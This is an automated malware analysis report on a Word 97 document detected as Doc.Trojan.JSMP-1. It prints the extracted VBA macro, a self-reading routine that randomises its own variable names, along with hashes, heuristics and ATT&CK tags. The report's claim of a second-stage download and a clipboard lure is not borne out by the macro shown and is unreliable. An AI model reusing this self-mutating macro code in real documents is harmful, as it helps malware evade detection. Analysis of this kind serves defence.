Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d29b442ea0284e38…

MALICIOUS

Office (OLE)

93.5 KB Created: 1999-12-02 13:25:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 8f3204e29093673ebc86aaafc0e1ff3b SHA-1: 7a773e823c5a66cb7cb71ac98c25db3d30442750 SHA-256: d29b442ea0284e3826dd2145f21ecfdeaad4995c3b93fe6951436fd82297afb2
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains VBA macros that obfuscate and execute code, likely to download and run a second-stage payload. The 'SE_CLIPBOARD_COMMAND_LURE' heuristic indicates the document prompts the user to paste content into a command-line context, a common social engineering tactic. ClamAV detections further confirm its malicious nature.

Heuristics 4

  • ClamAV: Doc.Trojan.JSMP-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.JSMP-1
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Clipboard command execution lure high SE_CLIPBOARD_COMMAND_LURE
    Document tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3410 bytes
SHA-256: c6f536fadadf7fb54f4794cf4c9d0999af669492416facff85f342576c7c03d5
Detection
ClamAV: Doc.Trojan.JSMP-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Test()
MsgBox JSMP(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 16))
End Sub
Private Function JSMP(OURCODE)
ALLVARIABLES = "JSMP OURCODE ALLVARIABLES VARLOOP NEWVAR VARPOS CURVAR "
For VARLOOP = 0 To 6
CURVAR = Left(ALLVARIABLES, InStr(ALLVARIABLES, Chr(32)) - 1)
ALLVARIABLES = Mid(ALLVARIABLES, InStr(ALLVARIABLES, Chr(32)) + 1)
NEWVAR = Chr((Int(Rnd * 74) + 130)) & Chr((Int(Rnd * 74) + 130)) & Chr((Int(Rnd * 74) + 130)) & Chr((Int(Rnd * 74) + 130)) & Chr((Int(Rnd * 74) + 130)) & Chr((Int(Rnd * 74) + 130))
Do
VARPOS = InStr(VARPOS + 1, OURCODE, CURVAR)
If VARPOS Then OURCODE = Mid(OURCODE, 1, (VARPOS - 1)) & NEWVAR & Mid(OURCODE, (VARPOS + Len(CURVAR)))
Loop While VARPOS
Next
JSMP = OURCODE
End Function

' Processing file: /tmp/qstore_isuz6ymn
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 69917 bytes
' Line #0:
' 	FuncDefn (Private Sub Test())
' Line #1:
' 	LitDI2 0x0001 
' 	LitDI2 0x0010 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	ArgsLd JSMP 0x0001 
' 	ArgsCall MsgBox 0x0001 
' Line #2:
' 	EndSub 
' Line #3:
' 	FuncDefn (Private Function JSMP(OURCODE, id_FFFE As Variant))
' Line #4:
' 	LitStr 0x0037 "JSMP OURCODE ALLVARIABLES VARLOOP NEWVAR VARPOS CURVAR "
' 	St ALLVARIABLES 
' Line #5:
' 	StartForVariable 
' 	Ld VARLOOP 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	LitDI2 0x0006 
' 	For 
' Line #6:
' 	Ld ALLVARIABLES 
' 	Ld ALLVARIABLES 
' 	LitDI2 0x0020 
' 	ArgsLd Chr 0x0001 
' 	FnInStr 
' 	LitDI2 0x0001 
' 	Sub 
' 	ArgsLd LBound 0x0002 
' 	St CURVAR 
' Line #7:
' 	Ld ALLVARIABLES 
' 	Ld ALLVARIABLES 
' 	LitDI2 0x0020 
' 	ArgsLd Chr 0x0001 
' 	FnInStr 
' 	LitDI2 0x0001 
' 	Add 
' 	ArgsLd Mid$ 0x0002 
' 	St ALLVARIABLES 
' Line #8:
' 	Ld Rnd 
' 	LitDI2 0x004A 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0082 
' 	Add 
' 	Paren 
' 	ArgsLd Chr 0x0001 
' 	Ld Rnd 
' 	LitDI2 0x004A 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0082 
' 	Add 
' 	Paren 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x004A 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0082 
' 	Add 
' 	Paren 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x004A 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0082 
' 	Add 
' 	Paren 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x004A 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0082 
' 	Add 
' 	Paren 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	Ld Rnd 
' 	LitDI2 0x004A 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0082 
' 	Add 
' 	Paren 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St NEWVAR 
' Line #9:
' 	Do 
' Line #10:
' 	Ld VARPOS 
' 	LitDI2 0x0001 
' 	Add 
' 	Ld OURCODE 
' 	Ld CURVAR 
' 	FnInStr3 
' 	St VARPOS 
' Line #11:
' 	Ld VARPOS 
' 	If 
' 	BoSImplicit 
' 	Ld OURCODE 
' 	LitDI2 0x0001 
' 	Ld VARPOS 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	ArgsLd Mid$ 0x0003 
' 	Ld NEWVAR 
' 	Concat 
' 	Ld OURCODE 
' 	Ld VARPOS 
' 	Ld CURVAR 
' 	FnLen 
' 	Add 
' 	Paren 
' 	ArgsLd Mid$ 0x0002 
' 	Concat 
' 	St OURCODE 
' 	EndIf 
' Line #12:
' 	Ld VARPOS 
' 	LoopWhile 
' Line #13:
' 	StartForVariable 
' 	Next 
' Line #14:
' 	Ld OURCODE 
' 	St JSMP 
' Line #15:
' 	EndFunc

Open this report in the interactive analyzer, or submit your own file for analysis.